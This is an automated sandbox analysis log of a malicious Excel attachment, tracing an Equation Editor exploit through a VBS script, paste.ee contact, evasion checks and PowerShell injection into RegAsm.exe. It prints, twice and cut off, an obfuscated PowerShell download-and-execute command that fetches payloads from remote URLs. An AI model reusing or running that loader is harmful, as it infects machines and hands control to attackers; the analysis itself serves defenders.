Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: INQUIRY#46789.xla.xlsx Stream path 'MBD00539CB3/Package' entropy: 7.95028609268 (max. 8.0)
Source: INQUIRY#46789.xla.xlsx Stream path 'Workbook' entropy: 7.98858428862 (max. 8.0)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Malware Analysis System Evasion
barindex
Delayed program exit found
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_0040F7A7 Sleep,ExitProcess, 28_2_0040F7A7
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 29_2_0040DD85
Contains functionality to enumerate running services
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 28_2_0041A748
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 600000 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 794 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1750 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3425 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6332 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 9708
Found decision node followed by non-executed suspicious APIs
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1924 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe TID: 1932 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3640 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3264 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4016 Thread sleep count: 3425 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4016 Thread sleep count: 6332 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3216 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3328 Thread sleep time: -11990383647911201s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3328 Thread sleep time: -8400000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4400 Thread sleep count: 251 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4400 Thread sleep time: -753000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4460 Thread sleep time: -180000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4400 Thread sleep count: 9708 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4400 Thread sleep time: -29124000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4592 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4712 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 28_2_00409253
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 28_2_0041C291
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 28_2_0040C34D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 28_2_00409665
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_0044E879 FindFirstFileExA, 28_2_0044E879
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 28_2_0040880C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_0040783C FindFirstFileW,FindNextFileW, 28_2_0040783C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW, 28_2_00419AF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 28_2_0040BB30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 28_2_0040BD37
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 28_2_100010F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_10006580 FindFirstFileExA, 28_2_10006580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_0040AE51 FindFirstFileW,FindNextFileW, 29_2_0040AE51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 30_2_00407EF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 31_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 31_2_00407898
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 28_2_00407C97
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_00418981 memset,GetSystemInfo, 29_2_00418981
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 28_2_004349F9
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 29_2_0040DD85
Contains functionality to dynamically determine API calls
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 28_2_0041CB50
Contains functionality to read the PEB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_03600653 mov edx, dword ptr fs:[00000030h] 9_2_03600653
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_004432B5 mov eax, dword ptr fs:[00000030h] 28_2_004432B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_10004AB4 mov eax, dword ptr fs:[00000030h] 28_2_10004AB4
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_00411CFE SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError, 28_2_00411CFE
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_00434B47 SetUnhandledExceptionFilter, 28_2_00434B47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 28_2_004349F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 28_2_0043BB22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 28_2_00434FDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 28_2_100060E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 28_2_10002639
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 28_2_10002B1C

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\wscript.exe Network Connect: 104.21.84.67 443 Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Domain query: paste.ee
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3100, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3664, type: MEMORYSTR
Bypasses PowerShell execution policy
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
Contains functionality to inject code into remote processes
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_004180EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError, 28_2_004180EF
Injects a PE file into a foreign processes
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008 Jump to behavior
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 28_2_004120F7
Contains functionality to simulate mouse events
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_00419627 mouse_event, 28_2_00419627
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\beautifulpictureforcouples.vbs" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgT